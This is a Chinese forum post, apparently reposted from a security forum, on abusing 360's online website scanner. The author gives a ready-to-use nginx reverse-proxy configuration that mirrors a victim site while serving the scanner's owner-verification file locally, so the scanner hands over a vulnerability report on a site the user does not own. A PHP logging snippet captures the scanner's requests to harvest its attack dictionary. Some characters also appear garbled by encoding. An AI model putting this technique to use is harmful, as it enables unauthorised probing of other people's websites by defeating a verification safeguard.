這是我之前發(fā)表在土司的一篇文章，在這里也分享給大家

360是個惡心的東西大家都懂的，但是有的時候我們可以小小的利用下。
先上個圖：

 
360網(wǎng)站在線掃描是可以掃描任意網(wǎng)站的，什么意思呢？我可以直接輸入別人的網(wǎng)址，360會直接進(jìn)行掃描，但是如果想看到掃描報告，那就得驗證站長權(quán)限了。

獲取360平臺掃描字典

既然360會掃描那就會有日志，那么我們就可以直接獲得360掃描所用的字典。

把這些內(nèi)容正則匹配一下就直接得到一個字典日志。

另外也可以用反向代理來掃描漏洞，在這里給大家貼一個我自己用的nginx反向代理配置，直接可用其中：www.vuln.cn為自己域名，www.test.com為目標(biāo)網(wǎng)站

server
    {
        listen 80 ;
        #listen [::]:80 default_server ipv6only=on;
        server_name www.vuln.cn;
        index index.html index.htm index.php;
        root  /home/wwwroot/default;
        proxy_set_header Host www.test.com;
        proxy_set_header x-forwarded-for $remote_addr;
        location / {
        proxy_pass http://www.test.com;
        sub_filter 'www.test.com'  '$host';
        sub_filter_once off;
        sub_filter_types *;
        proxy_set_header Accept-Encoding "";
        proxy_buffering off;
        }
        index index.html index.htm index.php;

        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf|js|css)$
           {
               proxy_pass http://www.test.com;

               if (-f $request_filename) {

                 expires 1d;

                 break;

                 }

          }

error_page   404   /404.php;
        include enable-php.conf;

        location /nginx_status
        {
            stub_status on;
            access_log   off;
        }

        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
        {
            expires      30d;
        }

        location ~ .*\.(js|css)?$
        {
            expires      12h;
        }

        location ~ /\.
        {
            deny all;
        }

        access_log  /home/wwwlogs/access.log  access;


          #這里填寫360驗證站長的txt文件名，
        location ~ 360認(rèn)證文件名.(txt)$ {
#放到本地站點(diǎn)根目錄，當(dāng)get這個地址的時候就會請求本地。
        root /home/wwwroot/default/;

        }
        }

配置好，重啟nignx，訪問自己域名即可返回www.test.com內(nèi)容，所以，當(dāng)掃描自己網(wǎng)站的時候?qū)嶋H請求的是www.test.com

獲取掃描日志：
將404文件修改為：

$data = $_SERVER['REQUEST_URI'] . "\n";
if ($_POST) {
    foreach ($_POST as $key => $value) {
        $data.= "$key=$value" . '\n';
    }
}
file_put_contents("log.txt", $data, FILE_APPEND);